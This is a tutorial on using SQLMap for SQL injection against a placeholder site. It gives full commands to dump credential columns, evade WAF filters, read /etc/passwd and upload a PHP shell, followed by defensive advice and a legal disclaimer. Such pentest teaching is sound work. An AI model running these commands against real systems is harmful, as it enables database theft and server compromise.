How to hack website database using SQL injection

### SQL Injection with SQLMap: A Full Guide with Practical Examples

**SQLMap** is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It's a powerful tool widely used by security professionals for ethical hacking and vulnerability assessments.

### What You Need

1. **SQLMap** installed on your system (Linux, Windows, or macOS).

2. A vulnerable web application for testing (such as DVWA - Damn Vulnerable Web App or any controlled environment).

3. **Python** installed (SQLMap is a Python-based tool).

### Step-by-Step Guide to SQL Injection with SQLMap

#### Step 1: Install SQLMap

1. **Install SQLMap** on Linux:

   ```bash

   sudo apt update

   sudo apt install sqlmap

   ```

2. **Install SQLMap** on Windows or macOS:

   - Download SQLMap from the official GitHub repository: [SQLMap GitHub](https://github.com/sqlmapproject/sqlmap).

   - Extract the files and run SQLMap using Python:

     ```bash

     python sqlmap.py

     ```

#### Step 2: Identify a Vulnerable URL

For this demonstration, we'll use an example URL:

```plaintext

http://example.com/products.php?id=1

```

#### Step 3: Testing for SQL Injection Vulnerability

1. **Basic Test with SQLMap**:

   Run SQLMap to test if the parameter `id` is vulnerable:

   ```bash

   sqlmap -u "http://example.com/products.php?id=1" --batch --banner

   ```

   - `-u` specifies the target URL.

   - `--batch` runs SQLMap in non-interactive mode, automatically choosing the default options.

   - `--banner` checks if the database version is accessible.

2. **Analyzing Results**:

   - If vulnerable, SQLMap will display the database banner, indicating the database type and version.

#### Step 4: Extracting Database Information

1. **Enumerate Databases**:

   Extract all databases on the server:

   ```bash

   sqlmap -u "http://example.com/products.php?id=1" --dbs

   ```

   - `--dbs` lists all databases.

2. **Select a Database**:

   Choose a database to explore, e.g., `test_db`.

3. **Enumerate Tables**:

   List all tables in the chosen database:

   ```bash

   sqlmap -u "http://example.com/products.php?id=1" -D test_db --tables

   ```

   - `-D test_db` specifies the database.

4. **Extract Columns from a Table**:

   Choose a table, e.g., `users`, and list its columns:

   ```bash

   sqlmap -u "http://example.com/products.php?id=1" -D test_db -T users --columns

   ```

   - `-T users` specifies the table.

5. **Dump Data from Columns**:

   Extract data from columns like `username` and `password`:

   ```bash

   sqlmap -u "http://example.com/products.php?id=1" -D test_db -T users -C username,password --dump

   ```

   - `-C username,password` specifies the columns.

   - `--dump` extracts and displays the data.

#### Step 5: Bypassing Authentication

Using SQLMap, you can bypass login pages by injecting into vulnerable input fields (like usernames and passwords).

1. **Example of Bypassing a Login**:

   If the login form uses an endpoint like `login.php?user=admin`, use SQLMap to test it:

   ```bash

   sqlmap -u "http://example.com/login.php?user=admin&pass=1" --batch --level=5 --risk=3 --tamper=space2comment

   ```

   - `--level=5` and `--risk=3` increase the depth and risk of the tests.

   - `--tamper=space2comment` modifies the payload to bypass filters (useful for WAF evasion).

#### Step 6: Advanced Exploitation

1. **Reading Files from the Server**:

   SQLMap can be used to read server files (if the vulnerability permits):

   ```bash

   sqlmap -u "http://example.com/products.php?id=1" --file-read="/etc/passwd"

   ```

2. **Writing Files to the Server**:

   Upload a backdoor or shell (requires advanced privilege):

   ```bash

   sqlmap -u "http://example.com/products.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

   ```

### Securing Against SQL Injection

1. **Input Validation**: Validate all inputs and only allow expected characters.

2. **Parameterized Queries**: Use prepared statements and parameterized queries to separate SQL code from data.

3. **Web Application Firewalls (WAF)**: Deploy a WAF to detect and block SQL injection attempts.

4. **Least Privilege Principle**: Restrict database permissions and only allow necessary access.

5. **Regular Security Testing**: Perform regular audits and penetration testing on your web applications.

### Legal and Ethical Considerations

Using SQLMap on websites without explicit permission is illegal and unethical. This guide is meant for educational purposes only to help developers secure their applications against SQL injection. Always use these techniques responsibly and only on systems you are authorized to test.